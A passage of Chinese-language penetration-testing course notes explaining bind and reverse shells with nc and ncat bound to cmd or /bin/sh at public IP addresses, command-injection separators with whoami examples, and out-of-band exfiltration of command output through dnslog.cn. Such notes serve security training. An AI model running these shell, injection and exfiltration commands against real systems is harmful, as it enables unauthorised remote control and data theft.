第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

发布时间 2024-01-03 22:51:09作者: CVE_2003_0102

文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

 

反弹shell

以参照物为准,以Linux为参照物,Linux主动发出的连接则为正向、Windows主动发出的则为反向

反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

1、正向连接:本地监听等待对方连接

Linux控制Windows

//绑定CMD到本地5566端口

nc -e cmd -lvp 5566

//主动连接目标5566

ncat 47.122.23.131 5566

 

Windows控制Linux

//绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566

//主动连接目标5566

nc 47.94.236.117 5566

 

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口

ncat -e /bin/sh 47.122.23.131 5566

//等待5566连接

nc -lvvp 5566

 

//绑定CMD到目标5566端口

nc -e cmd 47.94.236.117 5566

//等待5566连接

ncat -lvvp 5566

 

 

实验:控制内网的某一台机器的权限

Linux连接行不通:因为内网主机的IP不唯一

 

 

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符:| (管道符号) ||(逻辑或) &&(逻辑与)  &(后台任务符号)

Windows->| & || &&

Linux->; | || & && ``(特有``和;)

`` 可以嵌套执行命令

例子:

ping -c 1 127.0.0.1 ; whoami:执行ping和whoami

ping -c 1 127.0.0.1 | whoami:执行后面的whoami

ping -c 1 127.0.0.1 || whoami:执行ping,或执行

ping -c 1 127.0.0.1 & whoami:ping执行,whoami后台执行

ping -c 1 127.0.0.1 && whoami:逻辑与执行 

ping -c 1 127.0.0.1 `whoami` :先执行whoami,再执行ping

 

漏洞有,但数据不回显:

1、反弹shell

2、带外查询(主动把结果给出来)

使用dnslog.cn,Linux使用`` 嵌套执行命令,用以查看命令的执行结果

Windows使用powershell,

(

为什么要这样写

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量

结果带有“\” 导致ping无法执行

)